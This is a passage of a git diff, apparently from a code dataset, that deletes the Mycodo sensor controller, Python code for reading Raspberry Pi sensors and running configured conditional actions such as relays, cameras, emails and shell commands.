- - For example, if measured temperature is above 30C, notify me@gmail.com - - :rtype: None - - :param cond_id: ID of conditional to check - :type cond_id: str - """ - logger_cond = logging.getLogger("mycodo.sensor_cond_{id}".format( - id=cond_id)) - attachment_file = False - attachment_type = False - - cond = db_retrieve_table_daemon( - Conditional, device_id=cond_id, entry='first') - - message = u"[Sensor Conditional: {name} ({id})]".format( - name=cond.name, - id=cond_id) - - if cond.if_sensor_direction: - last_measurement = self.get_last_measurement( - cond.if_sensor_measurement) - if (last_measurement and - ((cond.if_sensor_direction == 'above' and - last_measurement > cond.if_sensor_setpoint) or - (cond.if_sensor_direction == 'below' and - last_measurement < cond.if_sensor_setpoint))): - - message += u" {meas}: {value} ".format( - meas=cond.if_sensor_measurement, - value=last_measurement) - if cond.if_sensor_direction == 'above': - message += "(>" - elif cond.if_sensor_direction == 'below': - message += "(<" - message += u" {sp} set value).".format( - sp=cond.if_sensor_setpoint) - else: - logger_cond.debug("Last measurement not found") - return 1 - elif cond.if_sensor_edge_detected: - if cond.if_sensor_edge_select == 'edge': - message += u" {edge} Edge Detected.".format( - edge=cond.if_sensor_edge_detected) - elif cond.if_sensor_edge_select == 'state': - if GPIO.input(int(self.location)) == cond.if_sensor_gpio_state: - message += u" {state} GPIO State Detected.".format( - state=cond.if_sensor_gpio_state) - else: - return 0 - - cond_actions = db_retrieve_table_daemon(ConditionalActions) - cond_actions = cond_actions.filter( - ConditionalActions.conditional_id == cond_id).all() - - for cond_action in cond_actions: - message += u" Conditional Action ({id}): {do_action}.".format( - id=cond_action.id, do_action=cond_action.do_action) - - # Actuate relay - if (cond_action.do_relay_id and - cond_action.do_relay_state in ['on', 'off']): - message += u" Turn relay {id} {state}".format( - id=cond_action.do_relay_id, - state=cond_action.do_relay_state) - if (cond_action.do_relay_state == 'on' and - cond_action.do_relay_duration): - message += u" for {sec} seconds".format( - sec=cond_action.do_relay_duration) - message += "." 
- relay_on_off = threading.Thread( - target=self.control.relay_on_off, - args=(cond_action.do_relay_id, - cond_action.do_relay_state,), - kwargs={'duration': cond_action.do_relay_duration}) - relay_on_off.start() - - # Execute command in shell - elif cond_action.do_action == 'command': - message += u" Execute '{com}' ".format( - com=cond_action.do_action_string) - - command_str = cond_action.do_action_string - for each_measurement, each_value in self.measurement.values.items(): - command_str = command_str.replace( - "((input_{var}))".format(var=each_measurement), str(each_value)) - command_str = command_str.replace( - "((input_location))", str(self.location)) - command_str = command_str.replace( - "((input_period))", str(self.cond_if_sensor_period[cond_id])) - _, _, cmd_status = cmd_output(command_str) - - message += u"(Status: {stat}).".format(stat=cmd_status) - - # Capture photo - elif cond_action.do_action in ['photo', 'photo_email']: - message += u" Capturing photo with camera ({id}).".format( - id=cond_action.do_camera_id) - camera_still = db_retrieve_table_daemon( - Camera, device_id=cond_action.do_camera_id) - attachment_file = camera_record('photo', camera_still) - - # Capture video - elif cond_action.do_action in ['video', 'video_email']: - message += u" Capturing video with camera ({id}).".format( - id=cond_action.do_camera_id) - camera_stream = db_retrieve_table_daemon( - Camera, device_id=cond_action.do_camera_id) - attachment_file = camera_record( - 'video', camera_stream, - duration_sec=cond_action.do_camera_duration) - - # Activate PID controller - elif cond_action.do_action == 'activate_pid': - message += u" Activate PID ({id}).".format( - id=cond_action.do_pid_id) - pid = db_retrieve_table_daemon( - PID, device_id=cond_action.do_pid_id, entry='first') - if pid.is_activated: - message += u" Notice: PID is already active!" - else: - activate_pid = threading.Thread( - target=self.control.controller_activate, - args=('PID', - cond_action.do_pid_id,)) - activate_pid.start() - - # Deactivate PID controller - elif cond_action.do_action == 'deactivate_pid': - message += u" Deactivate PID ({id}).".format( - id=cond_action.do_pid_id) - pid = db_retrieve_table_daemon( - PID, device_id=cond_action.do_pid_id, entry='first') - if not pid.is_activated: - message += u" Notice: PID is already inactive!" - else: - deactivate_pid = threading.Thread( - target=self.control.controller_deactivate, - args=('PID', - cond_action.do_pid_id,)) - deactivate_pid.start() - - elif cond_action.do_action in ['email', - 'photo_email', - 'video_email']: - if (self.email_count >= self.smtp_max_count and - time.time() < self.smtp_wait_timer[cond_id]): - self.allowed_to_send_notice = False - else: - if time.time() > self.smtp_wait_timer[cond_id]: - self.email_count = 0 - self.smtp_wait_timer[cond_id] = time.time() + 3600 - self.allowed_to_send_notice = True - self.email_count += 1 - - # If the emails per hour limit has not been exceeded - if self.allowed_to_send_notice: - message += u" Notify {email}.".format( - email=cond_action.do_action_string) - # attachment_type != False indicates to - # attach a photo or video - if cond_action.do_action == 'photo_email': - message += u" Photo attached to email." - attachment_type = 'still' - elif cond_action.do_action == 'video_email': - message += u" Video attached to email." 
- attachment_type = 'video' - - smtp = db_retrieve_table_daemon(SMTP, entry='first') - send_email(smtp.host, smtp.ssl, smtp.port, - smtp.user, smtp.passw, smtp.email_from, - cond_action.do_action_string, message, - attachment_file, attachment_type) - else: - logger_cond.debug( - "Wait {sec:.0f} seconds to email again.".format( - sec=self.smtp_wait_timer[cond_id]-time.time())) - - elif cond_action.do_action == 'flash_lcd': - message += u" Flashing LCD ({id}).".format( - id=cond_action.do_lcd_id) - start_flashing = threading.Thread( - target=self.control.flash_lcd, - args=(cond_action.do_lcd_id, 1,)) - start_flashing.start() - - logger_cond.debug(message) - - def lock_multiplexer(self): - """ Acquire a multiplexer lock """ - if self.multiplexer: - (lock_status, - lock_response) = self.setup_lock(self.mux_address, - self.mux_bus, - self.mux_lock) - if not lock_status: - self.logger.warning( - "Could not acquire lock for multiplexer. Error: " - "{err}".format(err=lock_response)) - self.updateSuccess = False - return 1 - self.logger.debug( - "Setting multiplexer ({add}) to channel {chan}".format( - add=self.mux_address_string, - chan=self.mux_chan)) - # Set multiplexer channel - (multiplexer_status, - multiplexer_response) = self.multiplexer.setup(self.mux_chan) - if not multiplexer_status: - self.logger.warning( - "Could not set channel with multiplexer at address {add}." - " Error: {err}".format( - add=self.mux_address_string, - err=multiplexer_response)) - self.updateSuccess = False - return 1 - - def unlock_multiplexer(self): - """ Remove a multiplexer lock """ - if self.multiplexer: - self.release_lock(self.mux_address, self.mux_bus, self.mux_lock) - - def update_measure(self): - """ - Retrieve measurement from sensor - - :return: None if success, 0 if fail - :rtype: int or None - """ - measurements = None - - if not self.device_recognized: - self.logger.debug("Device not recognized: {device}".format( - device=self.device)) - self.updateSuccess = False - return 1 - - self.lock_multiplexer() - - if self.adc: - try: - # Acquire a lock for ADC - (lock_status, - lock_response) = self.setup_lock(self.i2c_address, - self.i2c_bus, - self.adc_lock_file) - if not lock_status: - self.logger.warning( - "Could not acquire lock for multiplexer. 
Error: " - "{err}".format(err=lock_response)) - self.updateSuccess = False - return 1 - - # Get measurement from ADC - measurements = self.adc.next() - if measurements is not None: - # Get the voltage difference between min and max volts - diff_voltage = abs(self.adc_volts_max - self.adc_volts_min) - # Ensure the voltage stays within the min/max bounds - if measurements['voltage'] < self.adc_volts_min: - measured_voltage = self.adc_volts_min - elif measurements['voltage'] > self.adc_volts_max: - measured_voltage = self.adc_volts_max - else: - measured_voltage = measurements['voltage'] - # Calculate the percentage of the voltage difference - percent_diff = ((measured_voltage - self.adc_volts_min) / - diff_voltage) - - # Get the units difference between min and max units - diff_units = abs(self.adc_units_max - self.adc_units_min) - # Calculate the measured units from the percent difference - if self.adc_inverse_unit_scale: - converted_units = (self.adc_units_max - - (diff_units * percent_diff)) - else: - converted_units = (self.adc_units_min + - (diff_units * percent_diff)) - # Ensure the units stay within the min/max bounds - if converted_units < self.adc_units_min: - measurements[self.adc_measure] = self.adc_units_min - elif converted_units > self.adc_units_max: - measurements[self.adc_measure] = self.adc_units_max - else: - measurements[self.adc_measure] = converted_units - except Exception as except_msg: - self.logger.exception( - "Error while attempting to read adc: {err}".format( - err=except_msg)) - finally: - self.release_lock(self.i2c_address, - self.i2c_bus, - self.adc_lock_file) - else: - try: - # Get measurement from sensor - measurements = self.measure_sensor.next() - # Reset StopIteration counter on successful read - if self.stop_iteration_counter: - self.stop_iteration_counter = 0 - except StopIteration: - self.stop_iteration_counter += 1 - # Notify after 3 consecutive errors. Prevents filling log - # with many one-off errors over long periods of time - if self.stop_iteration_counter > 2: - self.stop_iteration_counter = 0 - self.logger.error( - "StopIteration raised. Possibly could not read " - "sensor. Ensure it's connected properly and " - "detected.") - except Exception as except_msg: - self.logger.exception( - "Error while attempting to read sensor: {err}".format( - err=except_msg)) - - self.unlock_multiplexer() - - if self.device_recognized and measurements is not None: - self.measurement = Measurement(measurements) - self.updateSuccess = True - else: - self.updateSuccess = False - - self.lastUpdate = time.time() - - def setup_lock(self, i2c_address, i2c_bus, lockfile): - execution_timer = timeit.default_timer() - try: - self.lock[lockfile] = LockFile(lockfile) - while not self.lock[lockfile].i_am_locking(): - try: - self.logger.debug( - "[Locking bus-{bus} 0x{i2c:02X}] Acquiring Lock: " - "{lock}".format( - bus=i2c_bus, - i2c=i2c_address, - lock=self.lock[lockfile].path)) - # wait up to 60 seconds - self.lock[lockfile].acquire(timeout=60) - except Exception as e: - self.logger.error( - "{cls} raised an exception: {err}".format( - cls=type(self).__name__, err=e)) - self.logger.exception( - "[Locking bus-{bus} 0x{i2c:02X}] Waited 60 seconds. 
" - "Breaking lock to acquire {lock}".format( - bus=i2c_bus, - i2c=i2c_address, - lock=self.lock[lockfile].path)) - self.lock[lockfile].break_lock() - self.lock[lockfile].acquire() - self.logger.debug( - "[Locking bus-{bus} 0x{i2c:02X}] Acquired Lock: " - "{lock}".format( - bus=i2c_bus, - i2c=i2c_address, - lock=self.lock[lockfile].path)) - self.logger.debug( - "[Locking bus-{bus} 0x{i2c:02X}] Executed in {ms:.1f} ms".format( - bus=i2c_bus, - i2c=i2c_address, - ms=(timeit.default_timer()-execution_timer)*1000)) - return 1, "Success" - except Exception as msg: - return 0, "Multiplexer Fail: {}".format(msg) - - def release_lock(self, i2c_address, i2c_bus, lockfile): - self.logger.debug( - "[Locking bus-{bus} 0x{i2c:02X}] Releasing Lock: {lock}".format( - bus=i2c_bus, i2c=i2c_address, lock=lockfile)) - self.lock[lockfile].release() - - def get_last_measurement(self, measurement_type): - """ - Retrieve the latest sensor measurement - - :return: The latest sensor value or None if no data available - :rtype: float or None - - :param measurement_type: Environmental condition of a sensor (e.g. - temperature, humidity, pressure, etc.) - :type measurement_type: str - """ - last_measurement = read_last_influxdb( - self.unique_id, measurement_type, int(self.period * 1.5)) - - if last_measurement: - last_value = last_measurement[1] - return last_value - else: - return None - - def edge_detected(self, pin): - gpio_state = GPIO.input(int(self.location)) - if time.time() > self.edge_reset_timer: - self.edge_reset_timer = time.time()+self.switch_reset_period - if (self.switch_edge == 'rising' or - (self.switch_edge == 'both' and gpio_state)): - rising_or_falling = 1 # Rising edge detected - else: - rising_or_falling = -1 # Falling edge detected - write_db = threading.Thread( - target=write_influxdb_value, - args=(self.unique_id, 'edge', rising_or_falling,)) - write_db.start() - - # Check sensor conditionals - for each_cond_id in self.cond_id: - if ((self.cond_is_activated[each_cond_id] and - self.cond_if_sensor_edge_select[each_cond_id] == 'edge') and - ((self.cond_if_sensor_edge_detected[each_cond_id] == 'rising' and - rising_or_falling == 1) or - (self.cond_if_sensor_edge_detected[each_cond_id] == 'falling' and - rising_or_falling == -1) or - self.cond_if_sensor_edge_detected[each_cond_id] == 'both')): - self.check_conditionals(each_cond_id) - - def setup_sensor_conditionals(self, cond_mod='setup'): - # Signal to pause the main loop and wait for verification - self.pause_loop = True - while not self.verify_pause_loop: - time.sleep(0.1) - - self.cond_id = {} - self.cond_action_id = {} - self.cond_name = {} - self.cond_is_activated = {} - self.cond_if_sensor_period = {} - self.cond_if_sensor_measurement = {} - self.cond_if_sensor_edge_select = {} - self.cond_if_sensor_edge_detected = {} - self.cond_if_sensor_gpio_state = {} - self.cond_if_sensor_direction = {} - self.cond_if_sensor_setpoint = {} - - sensor_conditional = db_retrieve_table_daemon( - Conditional) - sensor_conditional = sensor_conditional.filter( - Conditional.sensor_id == self.sensor_id) - sensor_conditional = sensor_conditional.filter( - Conditional.is_activated == True).all() - - if cond_mod == 'setup': - self.cond_timer = {} - self.smtp_wait_timer = {} - elif cond_mod == 'add': - self.logger.debug("Added Conditional") - elif cond_mod == 'del': - self.logger.debug("Deleted Conditional") - elif cond_mod == 'mod': - self.logger.debug("Modified Conditional") - else: - return 1 - - for each_cond in sensor_conditional: - if cond_mod == 'setup': 
- self.logger.info( - "Activated Conditional ({id})".format(id=each_cond.id)) - self.cond_id[each_cond.id] = each_cond.id - self.cond_is_activated[each_cond.id] = each_cond.is_activated - self.cond_if_sensor_period[each_cond.id] = each_cond.if_sensor_period - self.cond_if_sensor_measurement[each_cond.id] = each_cond.if_sensor_measurement - self.cond_if_sensor_edge_select[each_cond.id] = each_cond.if_sensor_edge_select - self.cond_if_sensor_edge_detected[each_cond.id] = each_cond.if_sensor_edge_detected - self.cond_if_sensor_gpio_state[each_cond.id] = each_cond.if_sensor_gpio_state - self.cond_if_sensor_direction[each_cond.id] = each_cond.if_sensor_direction - self.cond_if_sensor_setpoint[each_cond.id] = each_cond.if_sensor_setpoint - self.cond_timer[each_cond.id] = time.time() + each_cond.if_sensor_period - self.smtp_wait_timer[each_cond.id] = time.time() + 3600 - - self.pause_loop = False - self.verify_pause_loop = False - - def is_running(self): - return self.running - - def stop_controller(self): - self.thread_shutdown_timer = timeit.default_timer() - if self.device not in ['EDGE', 'ADS1x15', 'MCP342x']: - self.measure_sensor.stop_sensor() - self.running = False diff --git a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$controller_sensor.py.target.py b/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$controller_sensor.py.target.py deleted file mode 100644 index 5611ed9..0000000 --- a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$controller_sensor.py.target.py +++ /dev/null @@ -1,945 +0,0 @@ -# coding=utf-8 -# -# controller_sensor.py - Sensor controller that manages reading sensors and -# creating database entries -# -# Copyright (C) 2017 Kyle T. Gabriel -# -# This file is part of Mycodo -# -# Mycodo is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# Mycodo is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Mycodo. If not, see <http://www.gnu.org/licenses/>.
-#
-# Contact at kylegabriel.com
-
-import logging
-import fasteners
-import requests
-import threading
-import time
-import timeit
-import RPi.GPIO as GPIO
-
-from mycodo_client import DaemonControl
-from databases.models import Camera
-from databases.models import Conditional
-from databases.models import ConditionalActions
-from databases.models import PID
-from databases.models import Relay
-from databases.models import Sensor
-from databases.models import SMTP
-
-from devices.tca9548a import TCA9548A
-from devices.ads1x15 import ADS1x15Read
-from devices.mcp342x import MCP342xRead
-from sensors.mycodo_ram import MycodoRam
-from sensors.atlas_ph import AtlaspHSensor
-from sensors.atlas_pt1000 import AtlasPT1000Sensor
-from sensors.am2315 import AM2315Sensor
-from sensors.bh1750 import BH1750Sensor
-from sensors.bme280 import BME280Sensor
-from sensors.bmp180 import BMP180Sensor
-from sensors.bmp280 import BMP280Sensor
-from sensors.chirp import ChirpSensor
-from sensors.dht11 import DHT11Sensor
-from sensors.dht22 import DHT22Sensor
-from sensors.ds18b20 import DS18B20Sensor
-from sensors.htu21d import HTU21DSensor
-from sensors.k30 import K30Sensor
-from sensors.linux_command import LinuxCommand
-from sensors.mh_z16 import MHZ16Sensor
-from sensors.mh_z19 import MHZ19Sensor
-from sensors.raspi import RaspberryPiCPUTemp
-from sensors.raspi_cpuload import RaspberryPiCPULoad
-from sensors.raspi_freespace import RaspberryPiFreeSpace
-from sensors.tmp006 import TMP006Sensor
-from sensors.tsl2561 import TSL2561Sensor
-from sensors.tsl2591_sensor import TSL2591Sensor
-from sensors.sht1x_7x import SHT1x7xSensor
-from sensors.sht2x import SHT2xSensor
-from sensors.signal_pwm import PWMInput
-from sensors.signal_rpm import RPMInput
-
-from devices.camera import camera_record
-from utils.database import db_retrieve_table_daemon
-from utils.influx import format_influxdb_data
-from utils.influx import read_last_influxdb
-from utils.influx import write_influxdb_list
-from utils.influx import write_influxdb_value
-from utils.send_data import send_email
-from utils.system_pi import cmd_output
-
-from config import LIST_DEVICES_I2C
-
-
-class Measurement:
-    """
-    Class for holding all measurement values in a dictionary.
-    The dictionary is formatted in the following way:
-
-    {'measurement type':measurement value}
-
-    Measurement type: The environmental or physical condition
-    being measured, such as 'temperature', or 'pressure'.
-
-    Measurement value: The actual measurement of the condition.
-    """
-
-    def __init__(self, raw_data):
-        self.rawData = raw_data
-
-    @property
-    def values(self):
-        return self.rawData
-
-
-class SensorController(threading.Thread):
-    """
-    Class for controlling the sensor
-
-    """
-    def __init__(self, ready, sensor_id):
-        threading.Thread.__init__(self)
-
-        self.logger = logging.getLogger(
-            "mycodo.sensor_{id}".format(id=sensor_id))
-
-        self.stop_iteration_counter = 0
-        self.thread_startup_timer = timeit.default_timer()
-        self.thread_shutdown_timer = 0
-        self.ready = ready
-        self.lock = {}
-        self.measurement = None
-        self.updateSuccess = False
-        self.sensor_id = sensor_id
-        self.control = DaemonControl()
-        self.pause_loop = False
-        self.verify_pause_loop = True
-
-        self.cond_id = {}
-        self.cond_action_id = {}
-        self.cond_name = {}
-        self.cond_is_activated = {}
-        self.cond_if_sensor_period = {}
-        self.cond_if_sensor_measurement = {}
-        self.cond_if_sensor_edge_select = {}
-        self.cond_if_sensor_edge_detected = {}
-        self.cond_if_sensor_gpio_state = {}
-        self.cond_if_sensor_direction = {}
-        self.cond_if_sensor_setpoint = {}
-        self.cond_do_relay_id = {}
-        self.cond_do_relay_state = {}
-        self.cond_do_relay_duration = {}
-        self.cond_execute_command = {}
-        self.cond_email_notify = {}
-        self.cond_do_lcd_id = {}
-        self.cond_do_camera_id = {}
-        self.cond_timer = {}
-        self.smtp_wait_timer = {}
-
-        self.setup_sensor_conditionals()
-
-        sensor = db_retrieve_table_daemon(Sensor, device_id=self.sensor_id)
-        self.sensor_sel = sensor
-        self.unique_id = sensor.unique_id
-        self.i2c_bus = sensor.i2c_bus
-        self.location = sensor.location
-        self.power_relay_id = sensor.power_relay_id
-        self.measurements = sensor.measurements
-        self.device = sensor.device
-        self.interface = sensor.interface
-        self.device_loc = sensor.device_loc
-        self.baud_rate = sensor.baud_rate
-        self.period = sensor.period
-        self.resolution = sensor.resolution
-        self.sensitivity = sensor.sensitivity
-        self.cmd_command = sensor.cmd_command
-        self.cmd_measurement = sensor.cmd_measurement
-        self.cmd_measurement_units = sensor.cmd_measurement_units
-        self.mux_address_raw = sensor.multiplexer_address
-        self.mux_bus = sensor.multiplexer_bus
-        self.mux_chan = sensor.multiplexer_channel
-        self.adc_chan = sensor.adc_channel
-        self.adc_gain = sensor.adc_gain
-        self.adc_resolution = sensor.adc_resolution
-        self.adc_measure = sensor.adc_measure
-        self.adc_measure_units = sensor.adc_measure_units
-        self.adc_volts_min = sensor.adc_volts_min
-        self.adc_volts_max = sensor.adc_volts_max
-        self.adc_units_min = sensor.adc_units_min
-        self.adc_units_max = sensor.adc_units_max
-        self.adc_inverse_unit_scale = sensor.adc_inverse_unit_scale
-        self.sht_clock_pin = sensor.sht_clock_pin
-        self.sht_voltage = sensor.sht_voltage
-
-        # Edge detection
-        self.switch_edge = sensor.switch_edge
-        self.switch_bouncetime = sensor.switch_bouncetime
-        self.switch_reset_period = sensor.switch_reset_period
-
-        # PWM and RPM options
-        self.weighting = sensor.weighting
-        self.rpm_pulses_per_rev = sensor.rpm_pulses_per_rev
-        self.sample_time = sensor.sample_time
-
-        # Relay that will activate prior to sensor read
-        self.pre_relay_id = sensor.pre_relay_id
-        self.pre_relay_duration = sensor.pre_relay_duration
-        self.pre_relay_setup = False
-        self.next_measurement = time.time()
-        self.get_new_measurement = False
-        self.trigger_cond = False
-        self.measurement_acquired = False
-        self.pre_relay_activated = False
-        self.pre_relay_timer = time.time()
-
-        relay = db_retrieve_table_daemon(Relay, entry='all')
-        for each_relay in relay:  # Check if relay ID actually exists
-            if each_relay.id == self.pre_relay_id and self.pre_relay_duration:
-                self.pre_relay_setup = True
-
-        smtp = db_retrieve_table_daemon(SMTP, entry='first')
-        self.smtp_max_count = smtp.hourly_max
-        self.email_count = 0
-        self.allowed_to_send_notice = True
-
-        # Convert string I2C address to base-16 int
-        if self.device in LIST_DEVICES_I2C:
-            self.i2c_address = int(str(self.location), 16)
-
-        # Set up multiplexer if enabled
-        if self.device in LIST_DEVICES_I2C and self.mux_address_raw:
-            self.mux_address_string = self.mux_address_raw
-            self.mux_address = int(str(self.mux_address_raw), 16)
-            self.mux_lock = "/var/lock/mycodo_multiplexer_0x{i2c:02X}.pid".format(
-                i2c=self.mux_address)
-            self.mux_lock = fasteners.InterProcessLock(self.mux_lock)
-            self.mux_lock_acquired = False
-            self.multiplexer = TCA9548A(self.mux_bus, self.mux_address)
-        else:
-            self.multiplexer = None
-
-        if self.device in ['ADS1x15', 'MCP342x'] and self.location:
-            self.adc_lock_file = "/var/lock/mycodo_adc_bus{bus}_0x{i2c:02X}.pid".format(
-                bus=self.i2c_bus, i2c=self.i2c_address)
-
-        # Set up edge detection of a GPIO pin
-        if self.device == 'EDGE':
-            if self.switch_edge == 'rising':
-                self.switch_edge_gpio = GPIO.RISING
-            elif self.switch_edge == 'falling':
-                self.switch_edge_gpio = GPIO.FALLING
-            else:
-                self.switch_edge_gpio = GPIO.BOTH
-
-        # Lock multiplexer, if it's enabled
-        if self.multiplexer:
-            self.lock_multiplexer()
-
-        # Set up analog-to-digital converter
-        if self.device == 'ADS1x15':
-            self.adc = ADS1x15Read(self.i2c_address, self.i2c_bus,
-                                   self.adc_chan, self.adc_gain)
-        elif self.device == 'MCP342x':
-            self.adc = MCP342xRead(self.i2c_address, self.i2c_bus,
-                                   self.adc_chan, self.adc_gain,
-                                   self.adc_resolution)
-        else:
-            self.adc = None
-
-        self.device_recognized = True
-
-        # Set up sensors or devices
-        if self.device in ['EDGE', 'ADS1x15', 'MCP342x']:
-            self.measure_sensor = None
-        elif self.device == 'MYCODO_RAM':
-            self.measure_sensor = MycodoRam()
-        elif self.device == 'RPiCPULoad':
-            self.measure_sensor = RaspberryPiCPULoad()
-        elif self.device == 'RPi':
-            self.measure_sensor = RaspberryPiCPUTemp()
-        elif self.device == 'RPiFreeSpace':
-            self.measure_sensor = RaspberryPiFreeSpace(self.location)
-        elif self.device == 'AM2302':
-            self.measure_sensor = DHT22Sensor(self.sensor_id,
-                                              int(self.location))
-        elif self.device == 'AM2315':
-            self.measure_sensor = AM2315Sensor(self.sensor_id,
-                                               self.i2c_bus,
-                                               power=self.power_relay_id)
-        elif self.device == 'ATLAS_PH_I2C':
-            self.measure_sensor = AtlaspHSensor(self.interface,
-                                                i2c_address=self.i2c_address,
-                                                i2c_bus=self.i2c_bus,
-                                                sensor_sel=self.sensor_sel)
-        elif self.device == 'ATLAS_PH_UART':
-            self.measure_sensor = AtlaspHSensor(self.interface,
-                                                device_loc=self.device_loc,
-                                                baud_rate=self.baud_rate,
-                                                sensor_sel=self.sensor_sel)
-        elif self.device == 'ATLAS_PT1000_I2C':
-            self.measure_sensor = AtlasPT1000Sensor(self.interface,
-                                                    i2c_address=self.i2c_address,
-                                                    i2c_bus=self.i2c_bus)
-        elif self.device == 'ATLAS_PT1000_UART':
-            self.measure_sensor = AtlasPT1000Sensor(self.interface,
-                                                    device_loc=self.device_loc,
-                                                    baud_rate=self.baud_rate)
-        elif self.device == 'BH1750':
-            self.measure_sensor = BH1750Sensor(self.i2c_address,
-                                               self.i2c_bus,
-                                               self.resolution,
-                                               self.sensitivity)
-        elif self.device == 'BME280':
-            self.measure_sensor = BME280Sensor(self.i2c_address,
-                                               self.i2c_bus)
-        # TODO: BMP is an old designation and will be removed in the future
-        elif self.device in ['BMP', 'BMP180']:
-            self.measure_sensor = BMP180Sensor(self.i2c_bus)
-        elif self.device == 'BMP280':
-            self.measure_sensor = BMP280Sensor(self.i2c_address,
-                                               self.i2c_bus)
-        elif self.device == 'CHIRP':
-            self.measure_sensor = ChirpSensor(self.i2c_address,
-                                              self.i2c_bus)
-        elif self.device == 'DS18B20':
-            self.measure_sensor = DS18B20Sensor(self.location)
-        elif self.device == 'DHT11':
-            self.measure_sensor = DHT11Sensor(self.sensor_id,
-                                              int(self.location),
-                                              power=self.power_relay_id)
-        elif self.device == 'DHT22':
-            self.measure_sensor = DHT22Sensor(self.sensor_id,
-                                              int(self.location),
-                                              power=self.power_relay_id)
-        elif self.device == 'HTU21D':
-            self.measure_sensor = HTU21DSensor(self.i2c_bus)
-        elif self.device == 'K30_UART':
-            self.measure_sensor = K30Sensor(self.device_loc,
-                                            baud_rate=self.baud_rate)
-        elif self.device == 'MH_Z16_I2C':
-            self.measure_sensor = MHZ16Sensor(self.interface,
-                                              i2c_address=self.i2c_address,
-                                              i2c_bus=self.i2c_bus)
-        elif self.device == 'MH_Z16_UART':
-            self.measure_sensor = MHZ16Sensor(self.interface,
-                                              device_loc=self.device_loc,
-                                              baud_rate=self.baud_rate)
-        elif self.device == 'MH_Z19_UART':
-            self.measure_sensor = MHZ19Sensor(self.device_loc,
-                                              baud_rate=self.baud_rate)
-        elif self.device == 'SHT1x_7x':
-            self.measure_sensor = SHT1x7xSensor(int(self.location),
-                                                self.sht_clock_pin,
-                                                self.sht_voltage)
-        elif self.device == 'SHT2x':
-            self.measure_sensor = SHT2xSensor(self.i2c_address,
-                                              self.i2c_bus)
-        elif self.device == 'SIGNAL_PWM':
-            self.measure_sensor = PWMInput(int(self.location),
-                                           self.weighting,
-                                           self.sample_time)
-        elif self.device == 'SIGNAL_RPM':
-            self.measure_sensor = RPMInput(int(self.location),
-                                           self.weighting,
-                                           self.rpm_pulses_per_rev,
-                                           self.sample_time)
-        elif self.device == 'TMP006':
-            self.measure_sensor = TMP006Sensor(self.i2c_address,
-                                               self.i2c_bus)
-        elif self.device == 'TSL2561':
-            self.measure_sensor = TSL2561Sensor(self.i2c_address,
-                                                self.i2c_bus)
-        elif self.device == 'TSL2591':
-            self.measure_sensor = TSL2591Sensor(self.i2c_address,
-                                                self.i2c_bus)
-        elif self.device == 'LinuxCommand':
-            self.measure_sensor = LinuxCommand(self.cmd_command,
-                                               self.cmd_measurement)
-        else:
-            self.device_recognized = False
-            self.logger.debug("Device '{device}' not recognized".format(
-                device=self.device))
-            raise Exception("'{device}' is not a valid device type.".format(
-                device=self.device))
-
-        if self.multiplexer:
-            self.unlock_multiplexer()
-
-        self.edge_reset_timer = time.time()
-        self.sensor_timer = time.time()
-        self.running = False
-        self.lastUpdate = None
-
-    def run(self):
-        try:
-            self.running = True
-            self.logger.info("Activated in {:.1f} ms".format(
-                (timeit.default_timer() - self.thread_startup_timer) * 1000))
-            self.ready.set()
-
-            # Set up edge detection
-            if self.device == 'EDGE':
-                GPIO.setmode(GPIO.BCM)
-                GPIO.setup(int(self.location), GPIO.IN)
-                GPIO.add_event_detect(int(self.location),
-                                      self.switch_edge_gpio,
-                                      callback=self.edge_detected,
-                                      bouncetime=self.switch_bouncetime)
-
-            while self.running:
-                # Pause loop to modify conditional statements.
-                # Prevents execution of conditional while variables are
-                # being modified.
-                if self.pause_loop:
-                    self.verify_pause_loop = True
-                    while self.pause_loop:
-                        time.sleep(0.1)
-
-                if self.device not in ['EDGE']:
-                    # Signal that a measurement needs to be obtained
-                    if time.time() > self.next_measurement and not self.get_new_measurement:
-                        self.get_new_measurement = True
-                        self.trigger_cond = True
-                        self.next_measurement = time.time() + self.period
-
-                    # if signaled and a pre relay is set up correctly, turn the
-                    # relay on for the set duration
-                    if (self.get_new_measurement and
-                            self.pre_relay_setup and
-                            not self.pre_relay_activated):
-                        relay_on = threading.Thread(
-                            target=self.control.relay_on,
-                            args=(self.pre_relay_id,
-                                  self.pre_relay_duration,))
-                        relay_on.start()
-                        self.pre_relay_activated = True
-                        self.pre_relay_timer = time.time() + self.pre_relay_duration
-
-                    # If using a pre relay, wait for it to complete before
-                    # querying the sensor for a measurement
-                    if self.get_new_measurement:
-                        if ((self.pre_relay_setup and
-                                self.pre_relay_activated and
-                                time.time() < self.pre_relay_timer) or
-                                not self.pre_relay_setup):
-                            # Get measurement(s) from sensor
-                            self.update_measure()
-                            # Add measurement(s) to influxdb
-                            self.add_measure_influxdb()
-                            self.pre_relay_activated = False
-                            self.get_new_measurement = False
-
-                for each_cond_id in self.cond_id:
-                    if self.cond_is_activated[each_cond_id]:
-                        # Check sensor conditional if it has been activated
-                        if (self.device in ['EDGE'] and
-                                self.cond_if_sensor_edge_select[each_cond_id] == 'state' and
-                                time.time() > self.cond_timer[each_cond_id]):
-                            # Inputs that are triggered (switch, reed, hall, etc.)
-                            self.cond_timer[each_cond_id] = time.time() + self.cond_if_sensor_period[each_cond_id]
-                            self.check_conditionals(each_cond_id)
-                        elif ((not self.cond_timer[each_cond_id] and self.trigger_cond) or
-                                time.time() > self.cond_timer[each_cond_id]):
-                            # Inputs that are not triggered (sensors)
-                            self.cond_timer[each_cond_id] = time.time() + self.cond_if_sensor_period[each_cond_id]
-                            self.check_conditionals(each_cond_id)
-
-                self.trigger_cond = False
-
-                time.sleep(0.1)
-
-            self.running = False
-
-            if self.device == 'EDGE':
-                GPIO.setmode(GPIO.BCM)
-                GPIO.cleanup(int(self.location))
-
-            self.logger.info("Deactivated in {:.1f} ms".format(
-                (timeit.default_timer() - self.thread_shutdown_timer) * 1000))
-        except requests.ConnectionError:
-            self.logger.error("Could not connect to influxdb. Check that it "
-                              "is running and accepting connections")
-        except Exception as except_msg:
-            self.logger.exception("Error: {err}".format(
-                err=except_msg))
-
